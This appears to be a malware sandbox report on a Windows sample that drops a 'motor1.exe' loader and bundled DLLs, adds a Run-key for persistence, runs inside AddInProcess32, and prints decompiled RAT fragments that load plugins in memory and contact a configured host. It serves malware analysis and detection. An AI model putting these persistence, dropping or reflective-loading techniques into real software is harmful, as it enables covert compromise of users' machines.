Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndFilesystem.pdb source: motor1.exe, 00000004.00000002.2548964543.00007FFDA555F000.00000002.00000001.01000000.0000000F.sdmp, motor1.exe, 00000015.00000002.2603587965.00007FFD9B1BF000.00000002.00000001.01000000.00000028.sdmp
Source: Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndAppLocations.pdb source: motor1.exe, 00000004.00000002.2550154810.00007FFDAC0C5000.00000002.00000001.01000000.00000012.sdmp, motor1.exe, 00000015.00000002.2605618348.00007FFDA5495000.00000002.00000001.01000000.00000023.sdmp
Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.d7c6a10fb0263a69b4596321\node\out\Release\node.pdb) source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71C909000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\msvcp140_codecvt_ids.amd64.pdb source: motor1.exe, 00000004.00000002.2539797410.0000022D5F52B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: motor1.exe, 00000004.00000002.2552193033.00007FFDAC0F1000.00000002.00000001.01000000.0000000D.sdmp, motor1.exe, 00000015.00000002.2604813167.00007FFDA3391000.00000002.00000001.01000000.00000021.sdmp
Source: Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: motor1.exe, 00000004.00000002.2546154593.00007FFDA38B5000.00000002.00000001.01000000.0000000C.sdmp, motor1.exe, 00000015.00000002.2605019875.00007FFDA33F5000.00000002.00000001.01000000.00000020.sdmp
Source: pKxhpP0spW.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: pKxhpP0spW.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: pKxhpP0spW.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: pKxhpP0spW.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: pKxhpP0spW.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, Messages.cs .Net Code: Memory
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, Messages.cs .Net Code: Memory
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, Messages.cs .Net Code: Memory
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, Messages.cs .Net Code: Memory
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, Messages.cs .Net Code: Memory
Source: api-ms-win-crt-process-l1-1-0.dll.1.dr Static PE information: 0xA8F275DA [Mon Oct 27 06:36:10 2059 UTC]
Source: pKxhpP0spW.exe Static PE information: section name: _RDATA
Source: boost_filesystem-mt-x64.dll.1.dr Static PE information: section name: _RDATA
Source: FndCrashHandler.dll.1.dr Static PE information: section name: CPADinfo
Source: vcomp140.dll.1.dr Static PE information: section name: _RDATA
Source: vcruntime140.dll.1.dr Static PE information: section name: _RDATA
Source: boost_filesystem-mt-x64.dll.4.dr Static PE information: section name: _RDATA
Source: FndCrashHandler.dll.4.dr Static PE information: section name: CPADinfo
Source: vcomp140.dll.4.dr Static PE information: section name: _RDATA
Source: vcruntime140.dll.4.dr Static PE information: section name: _RDATA
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: 4_2_00007FFD93B745BE push rax; retf 4_2_00007FFD93B745D3
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: 4_2_00007FFD93B745D7 push rax; retf 4_2_00007FFD93B745D3
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: 4_2_00007FFD93E645D7 push rax; retf 4_2_00007FFD93E645D3
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: 4_2_00007FFD93E645BE push rax; retf 4_2_00007FFD93E645D3
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: 4_2_00007FFD942645D7 push rax; retf 4_2_00007FFD942645D3
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Code function: 4_2_00007FFD942645BE push rax; retf 4_2_00007FFD942645D3
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\msvcp140_codecvt_ids.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\FndOS.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\WebUid.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\FndHash.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\FndAppLocations.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\FndPointer.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\boost_filesystem-mt-x64.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\glog.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\boost_filesystem-mt-x64.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndTime.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\cpr.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndException.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndNetworking.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\vcruntime140_1.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\FndCrashHandler.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\vcomp140.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140_atomic_wait.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\WebUid.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\msvcp140_2.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-multibyte-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\msvcp140_atomic_wait.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\FndTime.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndOS.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndPointer.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140_1.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\glog.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\FndFilesystem.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\cpr.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\FndException.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\ucrtbase.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140_2.dll
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\FndString.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndCrashHandler.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\FndVersion.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\ucrtbase.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndString.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\vcomp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\msvcp140_1.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\FndNetworking.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndHash.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\concrt140.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndAppLocations.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndVersion.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\concrt140.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\FndFilesystem.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\vcruntime140_1.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\motor1.exe Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\pKxhpP0spW.exe File created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\msvcp140_codecvt_ids.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe File created: C:\Users\user\SystemRootDoc\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\installutil.exe.log
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run motor1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run motor1 Jump to behavior
Source: C:\Users\user\Desktop\pKxhpP0spW.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
